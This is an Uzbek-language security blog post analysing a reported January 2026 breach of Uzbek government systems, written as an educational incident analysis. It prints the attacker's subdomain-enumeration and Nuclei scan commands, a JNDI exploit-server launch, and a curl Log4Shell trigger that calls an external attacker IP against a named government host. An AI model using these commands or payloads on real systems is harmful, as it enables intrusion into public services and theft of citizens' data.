KIRISH
2026 yil 4-fevralda Reddit platformasida O’zbekiston Respublikasi davlat axborot tizimlariga nisbatan kiberxujum amalga oshirilgani haqida ma’lumotlar paydo bo’ldi. Noma’lum shaxs tomonidan e’lon qilingan dalillarga ko’ra, 29-yanvardan boshlab bir nechta davlat tizimlari buzilgan va millionlab fuqarolarning shaxsiy ma’lumotlari xavf ostiga tushgan.Blogimiz faoliyati ham aynan kiberxavfsizlik yo’nalishida ekanligini hisobga olib ushbu hujumga o’z munosabatimni bildirishga qaror qildim.
Muhim ogohlantirish:
Ushbu maqola muallif tomonidan ochiq manbalardan (darknet publikatsiyalari, screenshot’lar, sample ma’lumotlar) olingan dalillarni mustaqil tahlil qilish natijasida yozilgan. Barcha xulosalar shaxsiy tadqiqot va texnik tahlil asosida chiqarilgan bo’lib, rasmiy tekshiruv natijalarini aks ettirmaydi.
Eslatma:
Bu akademik-texnik tahlil bo’lib, kiberxavfsizlik sohasida bilim almashish maqsadida tayyorlangan
Taqdim etilgan ssenariy taxminiy bo’lib, haqiqiy voqealar ketma-ketligidan farq qilishi mumkin
Maqolada keltirilgan dalillarning haqiqiyligi mustaqil tasdiqlanmagan
Sample ma’lumotlardagi shaxsiy ma’lumotlar va maxfiy detallar maqolada ko’rsatilmagan
Maqsad: Xavfsizlik zaifliklarini aniqlash, shunga o’xshash xujumlarning oldini olish bo’yicha tavsiyalar berish va kiberxavfsizlik sohasi mutaxassislari uchun o’quv materiali yaratish.
Maqolada hujumning texnik tahlili, taxminiy attack timeline va ishlatilgan metodlar dalillar asosida batafsil yoritiladi. Tahlil davomida screenshot’lar, xaker eslatmalari (RECON fayl) va texnik vositalar dalil sifatida keltiriladi.
1.1 Ta’sirlangan Tizimlar
| EGOV (sso.egov.uz) |
| IHMA (Ijtimoiy Himoya Milliy Agentligi) |
| Ichki Ishlar Vazirligi (IIV) |
| UZMRC(O’zbekiston Ipoteka qayta moliyalashtirish kompaniyasi) |
| Boshqa tizimlar |
2. HUJUM BOSQICHLARI
2.1 QADAM : Passive Reconnaissance (Passiv Razvedka)
Taxminiy vaqt: Yanvar 2026 boshi
Nima qilindi?
Xaker hali hech qaysi serverga hujum qilmagan vaziyat. U faqat ochiq manbalardan .uz domenlari haqida ma’lumot yig’gan.Asosiy davlat organlari domenlarini aynan ushbu bosqichda to’plagan. Xaker e’lon qilgan SUBDOMAINS nomli faylni o’rganib chiqib quyidagi ma’lumotlarni aniqladim.
Ushbu faylda asosan 10 ta asosiy domenning subdomenlari tekshirilgan
| # | Domen | Subdomenlar soni | Tavsif |
|---|---|---|---|
| 1 | soliq.uz | ~150+ | Soliq qo’mitasi |
| 2 | edu.uz | ~340+ | Ta’lim vazirligi tizimi |
| 3 | mehnat.uz | ~90+ | Mehnat vazirligi |
| 4 | davxizmat.uz | ~60+ | Davlat xizmatlari markazi |
| 5 | adm.uz | ~110+ | ADM Group (xususiy kompaniya) |
| 6 | csec.uz | ~25+ | Kiberxavfsizlik markazi |
| 7 | digital.uz | ~30+ | Raqamli texnologiyalar vazirligi |
| 8 | bkm.uz | ~30 | BKM (xususiy sektor) |
| 9 | sbtsue.uz | ~100+ | TDIU Samarqand filiali |
| 10 | meningfikrim.uz | ~5 | Mening fikrim portali |
Keltirilgan domenlarning deyarli barchasi (90%+) davlat sektoriga tegishli.
Xaker avval asosiy davlat domenlarini aniqlagan (Google, research), keyin har bir domen uchun subfinder(yoki boshqa alternativ) ishlatgan va natijalarni bitta fayl qilib birlashtirgan:
subfinder -d soliq.uz -o soliq_subs.txt
subfinder -d edu.uz -o edu_subs.txt
...Sodda qilib aytganda xaker xuddi telefon daftarini varaqlagandek — barcha davlat saytlarining manzillarini yig’di. Hali hech qaysi saytga «tegmagan», faqat ro’yxat tuzgan.
Natijada: Xaker 1,863 ta subdomain to’plagan, jumladan:
| Domen | Tashkilot |
|---|---|
| ihma.uz (report-tiek.ihma.uz) | Ijtimoiy Himoya Milliy Agentligi |
| hisobot.stat.uz | Statistika qo’mitasi |
| dev-my3.soliq.uz | Soliq qo’mitasi |
| mail.edu.uz | Ta’lim vazirligi |
| auth.mehnat.uz | Mehnat vazirligi |
| … | … |
Muhim topilmalar — xakerning ko’zi bilan qaraganda qiziqarli subdomenlar aniqlangan:
| Turi | Misollar | Xavf darajasi |
| Admin panellar | admin., panel., cpanel. | 🔴 Yuqori |
| Test muhitlari | test., dev., beta. | 🔴 Yuqori |
| VPN serverlar | vpn., vpn2., vpn3. | 🔴 Yuqori |
| API endpoints | api., -api. | 🟡 O’rta |
2.2 QADAM Active Reconnaissance (Zaiflik qidirish)
Taxminiy vaqt: Yanvar 2026 o’rtalari
Nima qilindi?
Topilgan 1,863 ta subdomainga avtomatik zaiflik skanerlash o’tkazildi. Xaker har bir saytni ma’lum zaifliklar ro’yxati (CVE’lar) bilan solishtirdi.
Ishlatilgan vositalar
DALIL: RECON fayldan — Nuclei scanner ishlatilgan
./nuclei -t nuclei-templates-10.3.8/ -duc -rl 5
💡 Nuclei — bu avtomatik zaiflik scanner. U har bir saytni «Bu saytda Log4Shell bormi? SQL injection bormi?» kabi savollar bilan tekshiradi.
Xaker barcha subdomenlarni skanerlab, zaifliklarni qidirgan:
Natija
report-tiek.ihma.uz subdomenida Log4Shell (CVE-2021-44228) zaiflik topilgan!
Buni xaker tarqatgan LOG4SHELL screenshot ham tasdiqlaydi.
| Parametr | Qiymat |
| Zaiflik | Log4Shell (CVE-2021-44228) |
| Xavf darajasi | 10/10 — Kritik |
| Target | report-tiek.ihma.uz |
| Zaiflik turi | Remote Code Execution (RCE) |
| Qachon topilgan | 2021 yil dekabr — 4 yildan beri ma’lum! |
Sodda tilda tushuntirsam: Xaker 1,863 ta eshikni taqillatib ko’rdi. Ko’pchiligi yopiq edi, lekin report-tiek.ihma.uz eshigida singan qulf topdi — Log4Shell zaiflik
🚨 Bu juda muhim nuqta chunki mening taxminim buyicha xaker davlat tizimlariga aynan shu yerdan kirgan.Bu nimani anglatadi? EGOV (sso.egov.uz) yoki IIV tizimi kirish nuqtasi bo’lmagan yani xakerda ushbu tizimlarni buzish uchun aniq bir ishlaydigan exploiti mavjud bo’lmagan
2.3 QADAM Initial Access — Log4Shell Exploit
Aniq vaqt: 29 Yanvar 2026, 13:07:25 GMT (Toshkent vaqti: 18:07-18:09 (kechqurun))
DALIL: LOG4SHELL screenshot — hujum vaqti
2026-01-29 13:09:15 [RMISERVER] >> Have connection from /93.188.84.58:33401
Log4Shell qanday ishlaydi?
Log4j — Java dasturlarda ishlatiladigan logging kutubxonasi. Zaiflik shundaki, maxsus matn yuborilsa, server xakerning kodini avtomatik ishga tushiradi.
Hujum jarayoni
1-bosqich: Xaker o’z serverini tayyorladi (OVH, Fransiya):
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 51.178.174.66
2-bosqich: Zararli so’rov yubordi:
DALIL: LOG4SHELL screenshot — trigger buyrug’i
curl -k -H ‘Accept: ${jndi:rmi://51.178.174.66:1099/zh2ekn}’ https://report-tiek.ihma.uz/
3-bosqich: Xaker serverga ulandi:
DALIL: LOG4SHELL screenshot — ulanish loglari
2026-01-29 13:09:15 [RMISERVER] >> Have connection from /93.188.84.58:33401
2026-01-29 13:09:42 [RMISERVER] >> Have connection from /93.188.84.58:33402
2026-01-29 13:09:43 [RMISERVER] >> Have connection from /93.188.84.58:33403
Natija
| Parametr | Qiymat |
| Target | report-tiek.ihma.uz |
| Tashkilot | IHMA (Ijtimoiy Himoya Milliy Agentligi) |
| Xaker serveri | 51.178.174.66 (OVH, Fransiya) |
| Qurbon server IP | 93.188.84.58 |
| Vaqt | 29 Yanvar 2026, 13:07-13:09 GMT |
**MUHIM:**
Taxminimcha IHMA serveri UZMRC network bilan bog’langan (RECON faylda bir xil bo’limda mention qilingan), bu xakerga bir serverdan ikkinchisiga lateral movement imkonini bergan.
Hulosa: Asosiy Sabab: Patch qilinmagan
Log4j **Zaiflik:** CVE-2021-44228 (Log4Shell)
**Topilgan:** 2021 yil dekabr
**Hujum:** 2026 yil yanvar
⚠️ Bu degani: IHMA 4+ yil davomida critical zaiflikni patch qilmagan!
Bu maqolaning **BIRINCHI QISMI** bo’lib, faqat initial access bosqichini qamrab oldi.
**Keyingi qismlarda:**
— Lateral Movement — IHMA’dan boshqa tizimlarga o’tish
— EGOV OAuth compromise — qanday CLIENT_SECRET olingan
— IIV, UZMRC, Statistika — boshqa tizimlarni buzish
— Sliver C2 Botnet — 20-30 ta serverga backdoor
— Data Exfiltration — ma’lumotlarni o’g’irlash — Timeline va to’liq attack chain
**2-QISM tez orada chiqadi!**
CWGSecurity sizni eng yangi tahdidlar va kiberxavfsizlik yangiliklari bilan muntazam xabardor qilib boradi. Yana ko‘proq bunday tahlillar va foydali maslahatlar uchun Telegram kanalimizga qo‘shiling: @cwgsecurity
Comments